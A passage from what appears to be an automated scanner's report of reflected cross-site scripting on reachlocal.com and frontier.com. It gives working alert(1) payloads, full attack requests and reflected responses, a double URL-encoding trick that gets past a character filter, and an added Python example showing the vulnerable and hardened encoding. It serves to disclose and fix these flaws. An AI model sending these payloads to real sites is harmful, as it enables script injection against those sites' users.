_key=e2e30c5686d91c3f4971163361e1b86a&kw=233292&dynamic_proxy=1&primary_serv=utdi.reachlocal.net&se_refer=http%3A%2F%2Fwww.google.com%2Fsearch%3Fsourceid%3Dchrome%26ie%3DUTF-8%26q%3Dtelephone%2Bservice309b3"><script>alert(1)</script>4eadda684d&pub_cr_id=8668759748&rl_track_landing_pages=1" target="RL_top" onClick="javascript:open_popup('/coupon/d837/837045/index4.html?scid=2323693&cid=837045&tc=11090604520111271&rl_key=e2e30c5686d91c3f4971
...[SNIP]...

2.73. http://utdi.reachlocal.com/coupon/d837/837045/index5.html [tc parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://utdi.reachlocal.com
Path:   /coupon/d837/837045/index5.html

Issue detail

The value of the tc request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6b54e"><script>alert(1)</script>9fb0f72f32a was submitted in the tc parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /coupon/d837/837045/index5.html?scid=2323693&cid=837045&tc=110906045201112716b54e"><script>alert(1)</script>9fb0f72f32a&rl_key=e2e30c5686d91c3f4971163361e1b86a&kw=233292&dynamic_proxy=1&primary_serv=utdi.reachlocal.net&se_refer=http%3A%2F%2Fwww.google.com%2Fsearch%3Fsourceid%3Dchrome%26ie%3DUTF-8%26q%3Dtelephone%2Bservice&pub_cr_id=8668759748&rl_track_landing_pages=1 HTTP/1.1
Host: utdi.reachlocal.com
Proxy-Connection: keep-alive
Referer: http://utdi.reachlocal.com/coupon/?scid=2323693&cid=837045&tc=11090604520111271&rl_key=e2e30c5686d91c3f4971163361e1b86a&kw=233292&dynamic_proxy=1&primary_serv=utdi.reachlocal.net&se_refer=http%3A%2F%2Fwww.google.com%2Fsearch%3Fsourceid%3Dchrome%26ie%3DUTF-8%26q%3Dtelephone%2Bservice&pub_cr_id=8668759748
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: RlocalUID=scid%3D2323693%26cid%3D837045%26tc%3D11090604520111271%26kw%3D233292; RlocalHilite=kw_hilite_off%3D0%26se_refer%3Dhttp%253A%252F%252Fwww.google.com%252Fsearch%253Fsourceid%253Dchrome%2526ie%253DUTF-8%2526q%253Dtelephone%252Bservice; RlocalTiming=landing_loadtime_off%3D0%26retarget_off%3D0

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 11:52:54 GMT
Server: Apache
Vary: Accept-Encoding
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CUR OUR NOR"
Content-Length: 3263
Content-Type: text/html
Set-Cookie: NSC_wt-vtb-qspyz-iuuq=ffffffff096d1a7b45525d5f4f58455e445a4a423660;expires=Tue, 06-Sep-2011 12:17:47 GMT;path=/;httponly

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<html>
<head>
<title>ReachLocal Index</title>

<LINK href="h
...[SNIP]...
<a class="ad_header_url" href="/coupon/d837/837045/index4.html?scid=2323693&cid=837045&tc=110906045201112716b54e"><script>alert(1)</script>9fb0f72f32a&rl_key=e2e30c5686d91c3f4971163361e1b86a&kw=233292&dynamic_proxy=1&primary_serv=utdi.reachlocal.net&se_refer=http%3A%2F%2Fwww.google.com%2Fsearch%3Fsourceid%3Dchrome%26ie%3DUTF-8%26q%3Dtelephone%2Bserv
...[SNIP]...
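Findings 2.67 to 2.73 share one sink: every query parameter of the landing page is concatenated back into the query string of the double-quoted href attribute of the ad_header_url anchor, with no encoding, so a value containing `"><script>` closes the attribute and the tag. The following is an added example, not ReachLocal's code: it reconstructs that pattern, shows the hardened form (percent-encode each value for the query string, then HTML-encode the whole URL for the attribute), and confirms exploitability the way a scanner should, by checking whether the reflected text changes the parse tree rather than merely appears in the response. The link template, the link text "Coupon" and the helper names are assumptions; the parameter names and the 2.67 payload marker are taken from the report.

```python
"""Attribute-context reflected XSS: vulnerable vs. hardened rendering.

Added example; not ReachLocal's code. It reconstructs the pattern the report
describes for findings 2.67 to 2.73: request parameters are concatenated
into the query string of a double-quoted href attribute. The page layout,
link text and helper names are assumptions.
"""
import html
from html.parser import HTMLParser
from urllib.parse import urlencode

# Constructed sample: a subset of the parameters the landing page echoes.
BASE_PARAMS = {
    "scid": "2323693",
    "cid": "837045",
    "tc": "11090604520111271",
}

# The 2.67 payload: closes the attribute and the tag, then injects a script.
PAYLOAD = '58fcc"><script>alert(1)</script>222f71544b5'


def render_vulnerable(params):
    """Builds the anchor the way the report's responses show: raw values."""
    query = "&".join(f"{k}={v}" for k, v in params.items())
    return (f'<a class="ad_header_url" href="/coupon/d837/837045/index4.html?{query}" '
            f'target="RL_top">Coupon</a>')


def render_hardened(params):
    """Two layers of encoding, innermost first:
    1. urlencode() percent-encodes each value for the query-string context,
       so '"', '<' and '>' become %22, %3C, %3E and cannot form markup.
    2. html.escape(quote=True) encodes the assembled URL for the double-quoted
       attribute context (& becomes &amp;, any stray " becomes &quot;).
    """
    query = urlencode(params)
    href = html.escape(f"/coupon/d837/837045/index4.html?{query}", quote=True)
    return f'<a class="ad_header_url" href="{href}" target="RL_top">Coupon</a>'


class _TagCollector(HTMLParser):
    """Records every start tag the browser-side parser would see."""

    def __init__(self):
        super().__init__()
        self.tags = []

    def handle_starttag(self, tag, attrs):
        self.tags.append(tag)


def injected_tags(markup):
    """Return the set of start tags parsed from markup.

    'script' present means the payload escaped the attribute and became real
    markup; only 'a' present means it stayed inert attribute text. Reflection
    alone is not proof; the reflected text has to change the parse tree.
    """
    collector = _TagCollector()
    collector.feed(markup)
    return set(collector.tags)


def is_exploitable(render):
    """Submit the marker in primary_serv and see whether a script tag appears."""
    params = dict(BASE_PARAMS, primary_serv="utdi.reachlocal.net" + PAYLOAD)
    return "script" in injected_tags(render(params))


if __name__ == "__main__":
    print("vulnerable exploitable:", is_exploitable(render_vulnerable))
    print("hardened exploitable:  ", is_exploitable(render_hardened))
```

The same check applies to any of the seven parameters, since they all land in the same attribute; swapping primary_serv for tc or scid in is_exploitable gives the same result. Note that the hardened form needs both layers: HTML-encoding alone would leave a raw `"` inside the URL as `&quot;`, which is safe for the attribute but still wrong for the query string, and percent-encoding alone leaves the `&` separators unencoded in an HTML attribute.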

2.74. http://www.frontier.com/AgentOrdering/CustomAppTabInfo/tabs.css [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.frontier.com
Path:   /AgentOrdering/CustomAppTabInfo/tabs.css

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 59a54%2527%253balert%25281%2529%252f%252f24407793c50 was submitted in the REST URL parameter 1. This input was echoed as 59a54';alert(1)//24407793c50 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /AgentOrdering59a54%2527%253balert%25281%2529%252f%252f24407793c50/CustomAppTabInfo/tabs.css HTTP/1.1
Host: www.frontier.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.frontier.com/yahoo/fpsearchlg.aspa4f61%2527%253balert%25281%2529%252f%252f5fb1c88860b?type=biz
Cookie: ARPT=RNLPJJS10.160.118.20T0x0000000e_0xc7da8825CMWWI; s_cc=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 12:31:57 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 43787


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_ctl00_Head1"><
...[SNIP]...
<![CDATA[
$('#hiddenRedirectHREFAfterValidation').val('http://www.frontier.com/PageNotFound.aspx?404;http://www.frontier.com:80/AgentOrdering59a54';alert(1)//24407793c50/CustomAppTabInfo/tabs.css');//]]>
...[SNIP]...

2.75. http://www.frontier.com/AgentOrdering/CustomAppTabInfo/tabs.css [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.frontier.com
Path:   /AgentOrdering/CustomAppTabInfo/tabs.css

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 760b6%2527%253balert%25281%2529%252f%252f951f3ddd7d3 was submitted in the REST URL parameter 2. This input was echoed as 760b6';alert(1)//951f3ddd7d3 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /AgentOrdering/CustomAppTabInfo760b6%2527%253balert%25281%2529%252f%252f951f3ddd7d3/tabs.css HTTP/1.1
Host: www.frontier.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.frontier.com/yahoo/fpsearchlg.aspa4f61%2527%253balert%25281%2529%252f%252f5fb1c88860b?type=biz
Cookie: ARPT=RNLPJJS10.160.118.20T0x0000000e_0xc7da8825CMWWI; s_cc=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 12:32:06 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 43787


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_ctl00_Head1"><
...[SNIP]...
<![CDATA[
$('#hiddenRedirectHREFAfterValidation').val('http://www.frontier.com/PageNotFound.aspx?404;http://www.frontier.com:80/AgentOrdering/CustomAppTabInfo760b6';alert(1)//951f3ddd7d3/tabs.css');//]]>
...[SNIP]...

2.76. http://www.frontier.com/AgentOrdering/CustomAppTabInfo/tabs.css [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.frontier.com
Path:   /AgentOrdering/CustomAppTabInfo/tabs.css

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload aeffb%2527%253balert%25281%2529%252f%252f9b1214b2e90 was submitted in the REST URL parameter 3. This input was echoed as aeffb';alert(1)//9b1214b2e90 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /AgentOrdering/CustomAppTabInfo/tabs.cssaeffb%2527%253balert%25281%2529%252f%252f9b1214b2e90 HTTP/1.1
Host: www.frontier.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.frontier.com/yahoo/fpsearchlg.aspa4f61%2527%253balert%25281%2529%252f%252f5fb1c88860b?type=biz
Cookie: ARPT=RNLPJJS10.160.118.20T0x0000000e_0xc7da8825CMWWI; s_cc=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 12:32:17 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 43787


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_ctl00_Head1"><
...[SNIP]...
<![CDATA[
$('#hiddenRedirectHREFAfterValidation').val('http://www.frontier.com/PageNotFound.aspx?404;http://www.frontier.com:80/AgentOrdering/CustomAppTabInfo/tabs.cssaeffb';alert(1)//9b1214b2e90');//]]>
...[SNIP]...

2.77. http://www.frontier.com/AgentOrderingcf4af%27-alert(1)-%279ff1a208c26e1167 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.frontier.com
Path:   /AgentOrderingcf4af%27-alert(1)-%279ff1a208c26e1167

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 34a38%2527%253balert%25281%2529%252f%252f6b3936757b1 was submitted in the REST URL parameter 1. This input was echoed as 34a38';alert(1)//6b3936757b1 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /AgentOrderingcf4af%27-alert(1)-%279ff1a208c26e116734a38%2527%253balert%25281%2529%252f%252f6b3936757b1 HTTP/1.1
Host: www.frontier.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Cookie: ARPT=RNLPJJS10.160.118.20T0x0000000e_0xc7da8825CMWWI; s_cc=true; s_sq=%5B%5BB%5D%5D; ASP.NET_SessionId=wb3blj55msl0la32go52ws55; CP=null*

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 12:35:20 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 43791


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_ctl00_Head1"><
...[SNIP]...
<![CDATA[
$('#hiddenRedirectHREFAfterValidation').val('http://www.frontier.com/PageNotFound.aspx?404;http://www.frontier.com:80/AgentOrderingcf4af'-alert(1)-'9ff1a208c26e116734a38';alert(1)//6b3936757b1');//]]>
...[SNIP]...

2.78. http://www.frontier.com/AgentOrderingcf4af%27-alert(1)-%279ff1a208c26e1167 [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.frontier.com
Path:   /AgentOrderingcf4af%27-alert(1)-%279ff1a208c26e1167

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 476a4'%3balert(1)//9376138f416 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 476a4';alert(1)//9376138f416 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /AgentOrderingcf4af%27-alert(1)-%279ff1a208c26e1167?476a4'%3balert(1)//9376138f416=1 HTTP/1.1
Host: www.frontier.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Cookie: ARPT=RNLPJJS10.160.118.20T0x0000000e_0xc7da8825CMWWI; s_cc=true; s_sq=%5B%5BB%5D%5D; ASP.NET_SessionId=wb3blj55msl0la32go52ws55; CP=null*

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 12:32:24 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 43841


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_ctl00_Head1"><
...[SNIP]...
<![CDATA[
$('#hiddenRedirectHREFAfterValidation').val('http://www.frontier.com/PageNotFound.aspx?404;http://www.frontier.com:80/AgentOrderingcf4af'-alert(1)-'9ff1a208c26e1167?476a4';alert(1)//9376138f416=1');//]]>
...[SNIP]...

2.79. http://www.frontier.com/AgentOrderingcf4af%27-alert(document.location)-%279ff1a208c26e1167 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.frontier.com
Path:   /AgentOrderingcf4af%27-alert(document.location)-%279ff1a208c26e1167

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9f242%2527%253balert%25281%2529%252f%252fa3ed4687c09 was submitted in the REST URL parameter 1. This input was echoed as 9f242';alert(1)//a3ed4687c09 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /AgentOrderingcf4af%27-alert(document.location)-%279ff1a208c26e11679f242%2527%253balert%25281%2529%252f%252fa3ed4687c09 HTTP/1.1
Host: www.frontier.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Cookie: ARPT=RNLPJJS10.160.118.20T0x0000000e_0xc7da8825CMWWI; s_cc=true; s_sq=%5B%5BB%5D%5D; ASP.NET_SessionId=wb3blj55msl0la32go52ws55; CP=null*

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 12:35:37 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 43899


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_ctl00_Head1"><
...[SNIP]...
<![CDATA[
$('#hiddenRedirectHREFAfterValidation').val('http://www.frontier.com/PageNotFound.aspx?404;http://www.frontier.com:80/AgentOrderingcf4af'-alert(document.location)-'9ff1a208c26e11679f242';alert(1)//a3ed4687c09');//]]>
...[SNIP]...

2.80. http://www.frontier.com/AgentOrderingcf4af%27-alert(document.location)-%279ff1a208c26e1167 [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.frontier.com
Path:   /AgentOrderingcf4af%27-alert(document.location)-%279ff1a208c26e1167

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a0230'%3balert(1)//e42e942ef78 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as a0230';alert(1)//e42e942ef78 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /AgentOrderingcf4af%27-alert(document.location)-%279ff1a208c26e1167?a0230'%3balert(1)//e42e942ef78=1 HTTP/1.1
Host: www.frontier.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Cookie: ARPT=RNLPJJS10.160.118.20T0x0000000e_0xc7da8825CMWWI; s_cc=true; s_sq=%5B%5BB%5D%5D; ASP.NET_SessionId=wb3blj55msl0la32go52ws55; CP=null*

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 12:35:27 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 43949


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_ctl00_Head1"><
...[SNIP]...
<![CDATA[
$('#hiddenRedirectHREFAfterValidation').val('http://www.frontier.com/PageNotFound.aspx?404;http://www.frontier.com:80/AgentOrderingcf4af'-alert(document.location)-'9ff1a208c26e1167?a0230';alert(1)//e42e942ef78=1');//]]>
...[SNIP]...

2.81. http://www.frontier.com/Controls/SharedWebMethods.aspx/GetCurrentLocale [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.frontier.com
Path:   /Controls/SharedWebMethods.aspx/GetCurrentLocale

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4a972%2527%253balert%25281%2529%252f%252f878740809af was submitted in the REST URL parameter 2. This input was echoed as 4a972';alert(1)//878740809af in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

POST /Controls/SharedWebMethods.aspx4a972%2527%253balert%25281%2529%252f%252f878740809af/GetCurrentLocale HTTP/1.1
Host: www.frontier.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: application/json, text/javascript, */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Content-Type: application/json; charset=utf-8
X-Requested-With: XMLHttpRequest
Referer: http://www.frontier.com/yahoo/fpsearchlg.aspa4f61%2527%253balert%25281%2529%252f%252f5fb1c88860b?type=biz
Content-Length: 12
Cookie: ARPT=RNLPJJS10.160.118.20T0x0000000e_0xc7da8825CMWWI; s_cc=true; s_sq=%5B%5BB%5D%5D; ASP.NET_SessionId=wb3blj55msl0la32go52ws55; CP=null*
Pragma: no-cache
Cache-Control: no-cache

{'href': ''}

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 12:32:08 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 43839


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_ctl00_Head1"><
...[SNIP]...
<![CDATA[
$('#hiddenRedirectHREFAfterValidation').val('http://www.frontier.com/PageNotFound.aspx?404;http://www.frontier.com:80/Controls/SharedWebMethods.aspx4a972';alert(1)//878740809af/GetCurrentLocale');//]]>
...[SNIP]...

2.82. http://www.frontier.com/Controls/VirtualCode.ashx [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.frontier.com
Path:   /Controls/VirtualCode.ashx

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f7979'%3bfb5ed37a6ba was submitted in the REST URL parameter 1. This input was echoed as f7979';fb5ed37a6ba in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Controlsf7979'%3bfb5ed37a6ba/VirtualCode.ashx?pageid=73&origPath=%2ftopNav.css%2f HTTP/1.1
Host: www.frontier.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.frontier.com/yahoo/fpsearchlg.aspa4f61%2527%253balert%25281%2529%252f%252f5fb1c88860b?type=biz
Cookie: ARPT=RNLPJJS10.160.118.20T0x0000000e_0xc7da8825CMWWI; s_cc=true; s_sq=%5B%5BB%5D%5D

Response (redirected)

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 12:31:55 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 43359


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_ctl00_Head1"><
...[SNIP]...
<![CDATA[
$('#hiddenRedirectHREFAfterValidation').val('http://www.frontier.com/PageNotFound.aspx?aspxerrorpath=/Controlsf7979';fb5ed37a6ba/VirtualCode.ashx');//]]>
...[SNIP]...

2.83. http://www.frontier.com/Controls/VirtualCode.ashx [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.frontier.com
Path:   /Controls/VirtualCode.ashx

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload cb66e%2527%253balert%25281%2529%252f%252f3775dfb9153 was submitted in the REST URL parameter 2. This input was echoed as cb66e';alert(1)//3775dfb9153 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

